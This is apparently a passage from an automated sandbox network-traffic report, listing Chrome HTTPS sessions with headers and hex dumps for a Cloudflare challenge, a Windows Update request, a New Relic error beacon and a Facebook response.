                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1475INData Raw: 74 48 45 78 4d 72 59 31 37 36 65 33 37 62 67 30 39 62 43 35 2b 6e 46 76 74 6e 70 33 4c 2f 46 35 38 6e 63 79 4d 6e 4e 34 2b 37 4c 32 62 66 39 37 4c 76 56 2b 73 71 36 34 74 65 37 76 4e 7a 41 38 74 6e 46 44 4f 41 47 42 38 6a 6a 32 73 72 74 31 51 38 45 37 2b 62 77 44 2b 58 37 46 41 45 4a 43 78 62 7a 41 77 63 48 35 69 66 6d 42 2f 67 5a 2b 69 49 6c 34 68 34 6e 4b 7a 45 51 4a 68 6b 68 39 54 73 51 4f 42 72 36 48 52 4c 33 4c 6a 66 38 51 68 4d 39 4a 78 4d 46 4e 41 6f 39 50 30 6b 6a 55 43 45 2f 53 78 55 2f 54 30 38 57 51 31 46 4b 56 30 30 77 4e 52 52 67 51 31 6f 6d 57 46 34 36 4e 44 56 71 5a 6c 39 46 4a 7a 35 6f 57 79 70 79 4c 6c 55 71 4d 47 4a 6c 53 33 31 38 66 47 6c 70 67 6e 67 2f 59 30 4f 45 67 58 46 4a 67 6f 52 73 53 30 75 50 55 47 42 4e 61 5a 52 55 66 32 4f 44
                                                                                                                                                                                                                                                                                                              Data Ascii: tHExMrY176e37bg09bC5+nFvtnp3L/F58ncyMnN4+7L2bf97LvV+sq64te7vNzA8tnFDOAGB8jj2srt1Q8E7+bwD+X7FAEJCxbzAwcH5ifmB/gZ+iIl4h4nKzEQJhkh9TsQOBr6HRL3Ljf8QhM9JxMFNAo9P0kjUCE/SxU/T08WQ1FKV00wNRRgQ1omWF46NDVqZl9FJz5oWypyLlUqMGJlS318fGlpgng/Y0OEgXFJgoRsS0uPUGBNaZRUf2OD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1477INData Raw: 71 75 7a 35 2f 63 7a 74 6d 30 35 4d 54 58 70 2b 7a 5a 36 4d 44 6b 79 39 2b 78 76 74 2f 70 32 4e 6e 61 30 72 4c 46 35 74 62 78 38 39 7a 31 76 72 7a 50 33 62 37 37 38 75 4c 58 33 66 58 73 42 73 7a 48 42 67 72 79 34 77 54 54 46 50 49 4f 36 39 6a 2b 45 52 4d 59 44 52 58 65 44 51 38 5a 39 77 63 53 49 50 77 6f 44 79 48 6e 4b 51 49 6c 37 7a 54 72 46 52 67 50 46 43 6a 7a 43 78 6f 61 4d 78 6f 65 49 69 55 38 48 42 38 6b 4f 54 49 6d 4c 53 49 33 52 44 45 35 4f 30 59 6b 4d 7a 63 30 44 7a 59 71 54 30 39 4d 50 6a 31 58 4f 6b 49 2b 56 7a 34 76 50 31 6b 70 4d 6b 52 49 54 6a 6c 49 50 47 52 45 5a 57 6f 6e 54 6d 70 5a 59 56 56 59 53 58 6c 57 63 32 46 53 4f 48 31 36 59 6d 64 35 52 58 6c 79 5a 55 4f 48 52 47 31 48 62 6c 2b 4d 68 70 42 70 63 58 57 45 65 33 4e 70 57 6f 5a 38 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: quz5/cztm05MTXp+zZ6MDky9+xvt/p2Nna0rLF5tbx89z1vrzP3b778uLX3fXsBszHBgry4wTTFPIO69j+ERMYDRXeDQ8Z9wcSIPwoDyHnKQIl7zTrFRgPFCjzCxoaMxoeIiU8HB8kOTImLSI3RDE5O0YkMzc0DzYqT09MPj1XOkI+Vz4vP1kpMkRITjlIPGREZWonTmpZYVVYSXlWc2FSOH16Ymd5RXlyZUOHRG1Hbl+MhpBpcXWEe3NpWoZ8k
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1478INData Raw: 5a 76 64 54 43 6f 73 32 2f 78 73 76 46 75 73 76 6c 31 63 44 56 30 2b 76 4b 30 73 66 7a 7a 39 66 4c 38 38 33 62 30 4c 7a 58 33 2f 6e 37 30 2b 4c 58 42 4e 76 6e 32 2b 48 38 36 67 62 63 79 2b 33 4f 43 38 2f 78 48 64 7a 6e 2b 50 7a 59 36 2f 73 57 37 66 48 2b 42 50 54 66 41 77 67 43 39 51 34 4d 41 76 30 4d 45 41 34 48 45 41 51 43 42 68 51 49 4e 43 6b 58 4d 6a 67 51 48 44 59 6d 45 52 35 4a 43 41 41 69 42 41 51 45 4a 79 73 52 48 79 74 47 49 69 4d 78 4e 43 6f 6f 4f 6a 63 63 46 44 59 58 4f 69 34 37 4d 44 49 7a 51 46 6b 70 56 55 49 6a 4e 6a 6c 48 59 6d 52 41 53 69 74 52 4c 46 42 56 4d 44 42 55 56 7a 31 50 57 46 78 4b 54 56 78 67 58 6c 4e 6d 59 30 6c 57 5a 48 35 69 57 6d 64 63 62 6c 78 74 63 47 36 42 62 32 4e 5a 59 33 52 34 61 6d 5a 33 6b 6e 35 75 66 5a 64 64 62 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: ZvdTCos2/xsvFusvl1cDV0+vK0sfzz9fL883b0LzX3/n70+LXBNvn2+H86gbcy+3OC8/xHdzn+PzY6/sW7fH+BPTfAwgC9Q4MAv0MEA4HEAQCBhQINCkXMjgQHDYmER5JCAAiBAQEJysRHytGIiMxNCooOjccFDYXOi47MDIzQFkpVUIjNjlHYmRASitRLFBVMDBUVz1PWFxKTVxgXlNmY0lWZH5iWmdcblxtcG6Bb2NZY3R4amZ3kn5ufZddbn
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1479INData Raw: 79 65 57 77 30 75 79 72 72 62 33 75 77 38 4c 31 32 4f 36 31 78 66 62 4c 33 76 33 64 2b 63 54 6d 41 74 54 42 30 51 50 58 36 67 72 73 41 38 6e 5a 43 39 2f 38 45 76 45 4f 32 50 6f 58 2b 4e 58 6c 46 2b 73 4a 48 67 45 58 33 65 30 66 38 2f 34 6d 42 69 4c 73 44 79 73 6a 36 66 6b 72 41 41 73 79 46 53 76 78 41 6a 4d 49 46 7a 6f 61 4e 67 45 6a 50 76 76 39 44 6a 38 55 49 30 59 70 51 67 6b 45 51 6b 59 76 49 45 41 51 55 43 39 46 4b 42 55 37 54 52 64 46 52 31 45 77 50 30 70 59 4e 57 42 48 57 53 42 68 4f 6c 30 6f 62 43 52 4e 55 45 64 4d 59 43 78 44 55 6c 4a 77 61 58 5a 61 58 58 52 55 56 31 78 78 61 6c 35 67 65 47 56 35 51 49 56 31 66 6f 4f 4a 61 6e 35 78 68 47 4b 48 68 34 52 73 63 58 57 52 64 70 4e 74 6c 48 46 35 56 34 6d 65 6c 49 42 68 68 35 6c 67 70 59 4b 66 6a 58 35
                                                                                                                                                                                                                                                                                                              Data Ascii: yeWw0uyrrb3uw8L12O61xfbL3v3d+cTmAtTB0QPX6grsA8nZC9/8EvEO2PoX+NXlF+sJHgEX3e0f8/4mBiLsDysj6fkrAAsyFSvxAjMIFzoaNgEjPvv9Dj8UI0YpQgkEQkYvIEAQUC9FKBU7TRdFR1EwP0pYNWBHWSBhOl0obCRNUEdMYCxDUlJwaXZaXXRUV1xxal5geGV5QIV1foOJan5xhGKHh4RscXWRdpNtlHF5V4melIBhh5lgpYKfjX5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1481INData Raw: 4f 4c 4c 30 64 44 35 79 66 7a 63 31 64 58 4b 2b 67 44 54 38 73 50 79 32 2f 67 44 43 4e 7a 35 2f 72 2f 36 36 39 7a 50 38 77 4c 4f 36 67 76 75 34 78 6a 5a 38 75 63 63 33 66 58 2b 49 53 4c 74 39 52 76 34 47 76 45 42 4b 68 6e 6b 4c 2f 6a 36 36 69 7a 38 4b 50 34 57 38 53 51 71 38 78 73 33 47 6a 34 48 46 7a 49 79 4f 79 51 38 4e 30 51 5a 51 7a 4d 4a 50 42 35 4d 4f 69 4d 66 4b 79 73 4c 44 42 49 4f 4c 53 46 47 47 69 6c 55 4d 46 51 63 58 45 31 50 48 6d 59 6b 51 69 41 69 50 47 6b 6d 4b 69 73 6d 52 55 6c 4b 51 6e 4e 46 53 44 49 75 63 7a 64 58 53 57 56 77 64 45 38 7a 59 6e 5a 35 52 58 65 47 55 34 42 69 61 49 4a 61 52 49 4b 48 5a 33 71 44 63 6d 74 4d 62 59 74 69 64 34 35 74 68 57 75 57 67 5a 6d 4f 6c 70 68 38 5a 58 32 62 63 6f 6d 67 66 61 6d 61 6f 71 5a 37 65 71 57 72
                                                                                                                                                                                                                                                                                                              Data Ascii: OLL0dD5yfzc1dXK+gDT8sPy2/gDCNz5/r/669zP8wLO6gvu4xjZ8ucc3fX+ISLt9Rv4GvEBKhnkL/j66iz8KP4W8SQq8xs3Gj4HFzIyOyQ8N0QZQzMJPB5MOiMfKysLDBIOLSFGGilUMFQcXE1PHmYkQiAiPGkmKismRUlKQnNFSDIuczdXSWVwdE8zYnZ5RXeGU4BiaIJaRIKHZ3qDcmtMbYtid45thWuWgZmOlph8ZX2bcomgfamaoqZ7eqWr
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1482INData Raw: 66 30 74 39 33 75 30 63 33 66 2b 2b 58 2b 37 39 44 47 35 66 51 4b 79 73 6f 42 34 4f 33 4f 2b 76 48 6c 30 65 34 4e 46 65 49 52 32 74 50 61 2b 75 37 32 37 68 63 46 42 76 34 5a 34 79 6a 66 48 66 77 4f 42 79 4d 6d 2b 51 73 6e 37 7a 55 44 45 78 67 44 42 79 6a 33 50 53 63 79 44 51 38 4f 4e 7a 6f 6a 4a 79 4d 6f 4a 79 73 2f 51 68 59 6e 52 43 46 4e 4d 41 34 65 4b 6c 55 55 4d 6a 41 77 4d 55 38 6d 50 46 4d 64 4d 31 39 67 58 57 41 76 49 6a 49 2b 61 57 78 74 62 6b 34 33 4f 56 46 74 53 48 56 4a 54 46 51 33 57 58 6f 74 64 45 39 79 56 6e 30 2b 58 47 46 67 66 55 42 6d 64 31 70 57 52 7a 35 74 68 32 4a 5a 54 32 35 4c 5a 31 46 4f 6b 5a 4f 52 56 34 35 56 6d 32 5a 73 62 6e 70 33 64 36 4a 68 68 61 61 5a 66 47 53 55 70 33 32 57 68 36 43 5a 5a 4b 43 72 68 70 65 52 73 61 53 6d 68
                                                                                                                                                                                                                                                                                                              Data Ascii: f0t93u0c3f++X+79DG5fQKysoB4O3O+vHl0e4NFeIR2tPa+u727hcFBv4Z4yjfHfwOByMm+Qsn7zUDExgDByj3PScyDQ8ONzojJyMoJys/QhYnRCFNMA4eKlUUMjAwMU8mPFMdM19gXWAvIjI+aWxtbk43OVFtSHVJTFQ3WXotdE9yVn0+XGFgfUBmd1pWRz5th2JZT25LZ1FOkZORV45Vm2Zsbnp3d6JhhaaZfGSUp32Wh6CZZKCrhpeRsaSmh
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1483INData Raw: 4b 7a 73 79 2f 30 51 66 48 42 39 2f 57 2b 67 48 58 36 67 76 65 34 68 54 73 35 2b 67 48 46 2b 76 6e 35 64 76 6c 2f 75 6e 31 49 64 2f 39 2b 2f 76 38 47 2f 45 49 49 4f 67 48 35 43 6b 43 2b 51 41 54 38 75 37 31 43 51 34 42 4b 79 55 6f 4c 79 39 41 4d 54 67 61 49 43 77 74 52 6a 59 2f 48 7a 59 34 41 79 59 2f 55 43 74 49 4b 6b 55 6b 46 53 46 4b 53 69 6b 51 54 6b 35 55 4c 44 68 53 56 78 67 38 50 79 55 78 51 55 4d 62 53 45 49 6f 51 6a 74 68 50 45 59 38 54 46 51 31 50 6d 6c 45 57 6b 56 54 4d 32 38 30 57 46 78 61 54 48 5a 32 59 31 35 67 66 31 4a 57 59 6b 64 4e 57 32 64 73 57 6c 74 74 63 47 5a 6f 63 58 4e 5a 5a 6f 31 54 64 6e 42 35 67 57 75 41 65 33 57 44 67 5a 68 6b 66 4a 68 37 5a 6e 79 6c 62 4a 6c 73 62 47 71 78 66 57 32 77 75 4b 47 48 6b 4b 68 31 74 34 32 4f 6f 70
                                                                                                                                                                                                                                                                                                              Data Ascii: Kzsy/0QfHB9/W+gHX6gve4hTs5+gHF+vn5dvl/un1Id/9+/v8G/EIIOgH5CkC+QAT8u71CQ4BKyUoLy9AMTgaICwtRjY/HzY4AyY/UCtIKkUkFSFKSikQTk5ULDhSVxg8PyUxQUMbSEIoQjthPEY8TFQ1PmlEWkVTM280WFxaTHZ2Y15gf1JWYkdNW2dsWlttcGZocXNZZo1TdnB5gWuAe3WDgZhkfJh7ZnylbJlsbGqxfW2wuKGHkKh1t42Oop
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1485INData Raw: 39 77 66 63 39 41 62 39 79 73 4c 39 42 67 73 46 41 77 6e 54 47 41 76 51 39 68 54 31 2f 75 38 4e 47 68 38 64 44 65 45 41 49 66 34 46 4a 2b 63 56 48 51 63 69 2f 4f 63 70 42 51 76 7a 4a 50 49 77 42 69 6b 5a 4c 42 41 37 2f 44 6a 33 4e 77 49 31 45 44 30 36 42 53 41 38 4e 45 45 75 51 30 67 6a 45 6b 59 6a 46 53 46 55 4f 52 49 6f 4d 79 77 71 4c 46 78 55 4f 43 38 35 56 79 38 69 57 53 51 69 56 46 6f 35 62 56 68 64 4a 30 4a 63 53 32 5a 53 53 45 39 55 62 7a 42 54 53 45 30 30 56 30 78 73 54 46 73 37 66 46 64 65 50 32 70 54 59 6b 4e 65 57 6d 68 4c 69 47 43 43 5a 49 78 65 6a 6e 53 52 6a 34 39 34 68 56 36 61 6b 70 68 71 6d 47 46 76 6e 5a 78 37 6f 56 79 5a 61 71 56 39 70 57 31 37 6a 61 79 48 74 48 2b 74 64 59 36 4c 72 37 57 48 6b 4b 32 68 63 36 43 64 75 36 32 47 76 4a 75
                                                                                                                                                                                                                                                                                                              Data Ascii: 9wfc9Ab9ysL9BgsFAwnTGAvQ9hT1/u8NGh8dDeEAIf4FJ+cVHQci/OcpBQvzJPIwBikZLBA7/Dj3NwI1ED06BSA8NEEuQ0gjEkYjFSFUORIoMywqLFxUOC85Vy8iWSQiVFo5bVhdJ0JcS2ZSSE9UbzBTSE00V0xsTFs7fFdeP2pTYkNeWmhLiGCCZIxejnSRj494hV6akphqmGFvnZx7oVyZaqV9pW17jayHtH+tdY6Lr7WHkK2hc6Cdu62GvJu
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1486INData Raw: 41 72 70 79 52 50 63 46 2b 62 78 38 4f 54 73 42 51 34 64 48 2f 72 61 46 52 66 36 47 76 67 67 39 42 38 6f 2f 53 30 74 2b 67 67 68 4a 42 30 70 45 54 4d 57 43 6a 6b 78 39 66 67 35 4b 6a 63 74 45 54 73 67 2b 43 30 5a 47 2f 67 2f 45 79 4d 73 50 77 30 4f 4e 7a 6c 50 44 46 4d 7a 49 30 45 51 4c 68 68 4b 53 78 64 49 47 6c 77 78 59 6a 73 79 52 56 41 6a 4e 52 70 6e 55 6c 55 37 51 30 74 6c 57 47 56 54 57 31 35 53 50 6b 74 46 64 6e 56 79 64 33 30 31 55 33 70 2b 56 46 4d 36 50 32 38 2f 65 34 61 47 68 6f 78 31 6a 6d 70 38 54 32 78 6c 5a 46 46 77 6a 70 5a 56 64 4a 4f 4b 57 58 69 58 65 46 31 38 6c 6d 78 68 67 4a 6d 6d 5a 59 53 65 6d 6d 6d 49 6f 6f 68 74 6a 4b 53 79 63 5a 43 70 70 6e 57 55 72 5a 52 35 6d 4c 4f 2b 66 5a 79 32 77 6f 47 67 75 38 4b 5a 76 73 6a 42 69 71 69 74
                                                                                                                                                                                                                                                                                                              Data Ascii: ArpyRPcF+bx8OTsBQ4dH/raFRf6Gvgg9B8o/S0t+gghJB0pETMWCjkx9fg5KjctETsg+C0ZG/g/EyMsPw0ONzlPDFMzI0EQLhhKSxdIGlwxYjsyRVAjNRpnUlU7Q0tlWGVTW15SPktFdnVyd301U3p+VFM6P28/e4aGhox1jmp8T2xlZFFwjpZVdJOKWXiXeF18lmxhgJmmZYSemmmIoohtjKSycZCppnWUrZR5mLO+fZy2woGgu8KZvsjBiqit
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1488INData Raw: 59 50 31 66 63 50 31 76 6f 56 47 2b 6f 4f 38 52 2f 63 44 51 37 6c 2f 67 45 6e 41 76 59 4a 4a 76 67 4c 4d 44 4d 4c 4a 54 41 73 4b 7a 55 45 39 51 38 73 43 53 30 55 4d 54 76 35 44 77 38 33 41 78 34 6a 4a 67 63 47 4f 44 6f 45 43 53 64 51 45 44 77 6c 54 6c 51 57 4d 45 49 51 4b 6a 52 50 48 6c 6f 58 55 53 77 73 59 6c 34 69 50 6a 46 6b 4e 6d 46 42 51 30 4e 62 58 7a 6c 50 4b 69 70 79 4d 54 4a 79 63 6a 68 44 55 6e 45 39 56 45 42 34 67 58 64 59 4f 30 5a 37 4f 6d 6c 79 64 56 74 6a 6a 48 35 34 69 59 47 4f 69 6f 64 56 67 55 39 72 56 59 68 6c 62 32 35 33 56 31 70 66 57 6e 6c 35 59 58 53 5a 59 49 4b 72 68 71 46 74 68 48 43 6f 73 61 65 49 61 33 61 72 61 70 6d 69 70 59 75 62 76 4c 4e 2b 77 62 61 2f 67 6f 39 2f 74 36 50 49 79 36 50 46 76 49 32 62 78 73 43 64 72 72 33 4f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: YP1fcP1voVG+oO8R/cDQ7l/gEnAvYJJvgLMDMLJTAsKzUE9Q8sCS0UMTv5Dw83Ax4jJgcGODoECSdQEDwlTlQWMEIQKjRPHloXUSwsYl4iPjFkNmFBQ0NbXzlPKipyMTJycjhDUnE9VEB4gXdYO0Z7OmlydVtjjH54iYGOiodVgU9rVYhlb253V1pfWnl5YXSZYIKrhqFthHCosaeIa3arapmipYubvLN+wba/go9/t6PIy6PFvI2bxsCdrr3Or
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1489INData Raw: 36 35 79 41 58 34 66 4d 56 46 39 38 6b 4b 42 33 6f 41 4f 73 6b 4c 53 4d 45 35 76 45 6e 35 52 55 65 49 51 63 6c 4f 44 63 6c 39 52 67 31 4b 54 6b 63 50 68 63 74 46 78 34 58 48 68 52 48 47 30 73 6f 50 78 77 6d 4a 30 39 50 49 44 4d 4e 57 54 45 57 4c 31 74 50 46 31 38 36 56 53 45 34 4a 46 78 6c 57 7a 77 66 4b 6c 38 65 54 56 5a 5a 50 79 70 77 62 31 30 75 55 47 31 68 63 55 5a 33 64 56 73 31 65 6e 68 66 58 48 35 58 62 56 64 65 56 31 35 55 68 31 75 4c 61 48 39 6d 69 6f 6c 69 6a 5a 43 53 69 35 56 6b 6d 57 53 5a 58 49 6c 70 65 36 46 63 66 5a 57 67 6e 4a 75 6c 64 47 70 2f 64 57 78 6e 67 36 43 4e 61 34 4a 2b 64 48 43 4d 71 59 47 74 68 4c 6c 38 71 62 31 33 66 6e 39 36 6d 5a 33 44 6c 71 48 48 6f 5a 32 31 68 49 6a 50 7a 4b 66 44 79 5a 4f 78 6b 37 4f 6f 6f 38 54 50 6d 4a
                                                                                                                                                                                                                                                                                                              Data Ascii: 65yAX4fMVF98kKB3oAOskLSME5vEn5RUeIQclODcl9Rg1KTkcPhctFx4XHhRHG0soPxwmJ09PIDMNWTEWL1tPF186VSE4JFxlWzwfKl8eTVZZPypwb10uUG1hcUZ3dVs1enhfXH5XbVdeV15Uh1uLaH9miolijZCSi5VkmWSZXIlpe6FcfZWgnJuldGp/dWxng6CNa4J+dHCMqYGthLl8qb13fn96mZ3DlqHHoZ21hIjPzKfDyZOxk7Ooo8TPmJ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1490INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              106192.168.2.1649820104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:45 UTC1490OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              107104.17.2.184443192.168.2.1649820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:45 UTC1490INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:45 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              cf-chl-out: GqVr+/4gwOGrBOcBJ9/jbw==$xlWRtPk5W4vtj6UP0OcOnA==
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4275aff3891-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:45 UTC1491INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:45 UTC1491INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              108192.168.2.164982413.85.23.86443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:55 UTC1491OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S4ayF1XodpULRLK&MD=x2yT1Dku HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:56 UTC1491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                                                                                                                              MS-CorrelationId: 86b5c681-d2f6-4136-8c2e-ac1697f05b22
                                                                                                                                                                                                                                                                                                              MS-RequestId: d5459ce9-19c0-4cf0-8d56-4ce032ce1e46
                                                                                                                                                                                                                                                                                                              MS-CV: gXMRlre1U0+qbM4R.0
                                                                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:55 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 25457
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:56 UTC1491INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                                                                                                                              Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:56 UTC1507INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                                                                                                                              Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              109192.168.2.1649830162.247.243.30443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:25 UTC1516OUTGET /jserrors/1/a3d3f0e0e6?a=7895775&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=68805&ck=1&ref=https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: bam-cell.nr-data.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: JSESSIONID=4950c9090a569fe0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              11157.240.229.1443192.168.2.1649742C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: X-FB-Content-MD5
